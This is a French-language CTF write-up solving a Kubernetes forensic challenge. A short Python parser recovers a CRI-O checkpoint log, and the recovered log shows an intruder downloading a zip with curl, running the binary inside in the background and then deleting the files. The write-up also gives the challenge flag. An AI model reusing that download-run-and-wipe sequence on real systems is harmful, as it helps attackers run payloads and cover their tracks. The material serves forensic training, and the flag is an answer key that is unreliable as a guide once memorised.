CTF Write-Up

entièrement en français et réalisé par ThaySan.

View on GitHub

[Analyse forensique] Les Mystères du cluster de la Comtesse de Ségur [1/2] - 348pts

checkpoint-bash_default-bash-2023-05-06T090421Z.zip

title: Les Mystères du cluster de la Comtesse de Ségur [1/2]

category: Analyse forensique

difficulty: Moyen

point: 348

author: Typhlos#9037

description: Vous rencontrez la Comtesse de Ségur au Procope. La Comtesse de Ségur a créé une entreprise de vente de livres en ligne en s’aidant du succès de ses livres pour enfants et l’a déployé sur un cluster Kubernetes.

Celle-ci vous explique avoir été victime d’une demande de rançon. En effet, quelqu’un lui a volé ses livres pas encore publiés et menace de les publier sur Internet si elle ne lui paye la rançon demandée.

La Comtesse vous demande d’enquêter sur la manière dont le maître chanteur a pu voler ses livres et vous donne pour cela les informations à sa disposition.

Votre mission consiste à exploiter le fichier fourni pour y retrouver les traces du maître chanteur.

La 2e partie est en rétro-ingénierie.

Solution

Le fichier nommé io.kubernetes.cri-o.LogPath est intéressant mais il faut le parser.

En python cela donne :

data = open('checkpoint-bash_default-bash-2023-05-06T090421Z/io.kubernetes.cri-o.LogPath').readlines()
lines = []
for line in data:
	if line.startswith('2023-05-12'):
		lines.append(line)
	else:
		lines[-1] += line

lines = [line.split('stdout ')[1].split(' ', 1) for line in lines]
for line in lines:
	print(line[1][:-1], end='')

(Reading database ... 55%
(Reading database ... 60%
(Reading database ... 65%(Reading database ... 70%(Reading database ... 75%(Reading database ... 80%(Reading database ... 85%(Reading database ... 90%(Reading database ... 95%(Reading database ... 100%
(Reading database ... 7138 files and directories currently installed.)Preparing to unpack .../xxd_2%3a8.2.2434-3+deb11u1_amd64.deb ...7Progress: [  0%] [.................................................................................................................................] 87Progress: [  5%] [######...........................................................................................................................] 8Unpacking xxd (2:8.2.2434-3+deb11u1) ...7Progress: [ 10%] [############.....................................................................................................................] 8Selecting previously unselected package vim-common.Preparing to unpack .../vim-common_2%3a8.2.2434-3+deb11u1_all.deb ...7Progress: [ 14%] [##################...............................................................................................................] 8Unpacking vim-common (2:8.2.2434-3+deb11u1) ...7Progress: [ 19%] [########################.........................................................................................................] 8Selecting previously unselected package libgpm2:amd64.Preparing to unpack .../libgpm2_1.20.7-8_amd64.deb ...7Progress: [ 24%] [##############################...................................................................................................] 8Unpacking libgpm2:amd64 (1.20.7-8) ...7Progress: [ 29%] [####################################.............................................................................................] 8Selecting previously unselected package vim-runtime.Preparing to unpack .../vim-runtime_2%3a8.2.2434-3+deb11u1_all.deb ...7Progress: [ 33%] [##########################################.......................................................................................] 8Adding 'diversion of /usr/share/vim/vim82/doc/help.txt to /usr/share/vim/vim82/doc/help.txt.vim-tiny by vim-runtime'Adding 'diversion of /usr/share/vim/vim82/doc/tags to /usr/share/vim/vim82/doc/tags.vim-tiny by vim-runtime'Unpacking vim-runtime (2:8.2.2434-3+deb11u1) ...7Progress: [ 38%] [#################################################................................................................................] 8Selecting previously unselected package vim.Preparing to unpack .../vim_2%3a8.2.2434-3+deb11u1_amd64.deb ...7Progress: [ 43%] [#######################################################..........................................................................] 8Unpacking vim (2:8.2.2434-3+deb11u1) ...7Progress: [ 48%] [#############################################################....................................................................] 8Setting up libgpm2:amd64 (1.20.7-8) ...7Progress: [ 52%] [###################################################################..............................................................] 87Progress: [ 57%] [#########################################################################........................................................] 8Setting up xxd (2:8.2.2434-3+deb11u1) ...7Progress: [ 62%] [###############################################################################..................................................] 87Progress: [ 67%] [#####################################################################################............................................] 8Setting up vim-common (2:8.2.2434-3+deb11u1) ...7Progress: [ 71%] [############################################################################################.....................................] 87Progress: [ 76%] [##################################################################################################...............................] 8Setting up vim-runtime (2:8.2.2434-3+deb11u1) ...7Progress: [ 81%] [########################################################################################################.........................] 87Progress: [ 86%] [##############################################################################################################...................] 8Setting up vim (2:8.2.2434-3+deb11u1) ...7Progress: [ 90%] [####################################################################################################################.............] 8update-alternatives: using /usr/bin/vim.basic to provide /usr/bin/vim (vim) in auto modeupdate-alternatives: using /usr/bin/vim.basic to provide /usr/bin/vimdiff (vimdiff) in auto modeupdate-alternatives: using /usr/bin/vim.basic to provide /usr/bin/rvim (rvim) in auto modeupdate-alternatives: using /usr/bin/vim.basic to provide /usr/bin/rview (rview) in auto modeupdate-alternatives: using /usr/bin/vim.basic to provide /usr/bin/vi (vi) in auto modeupdate-alternatives: using /usr/bin/vim.basic to provide /usr/bin/view (view) in auto modeupdate-alternatives: using /usr/bin/vim.basic to provide /usr/bin/ex (ex) in auto modeupdate-alternatives: using /usr/bin/vim.basic to provide /usr/bin/editor (editor) in auto mode7Progress: [ 95%] [##########################################################################################################################.......] 8Processing triggers for libc-bin (2.31-13+deb11u6) ...78root@bash:/# curl agent.challenges.404ctf.fr -o agent.zip  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100 1544k  100 1544k    0     0   251M      0 --:--:-- --:--:-- --:--:--  251Mroot@bash:/# mv out.txt /rroot/ run/  root@bash:/# mv out.txt /root/root@bash:/# mv agent.zip /root/root@bash:/# cd /root/root@bash:~# lsagent.zip  out.txtroot@bash:~# unzip agent.zip Archive:  agent.zip  inflating: agent                     inflating: flag.txt                root@bash:~# export HONEYPOT=trueroot@bash:~# ./agent&[1] 9317root@bash:~# rm agent agent.zip flag.txt root@bash:~# 
root@bash:~# kill -9 9317root@bash:~#

Dans les dernières lignes, on peut voir :

curl agent.challenges.404ctf.fr -o agent.zip

Si l’on télécharge le fichier, à l’intérieur on trouvera flag.txt


FLAG : 404CTF{K8S_checkpoints_utile_pour_le_forensic}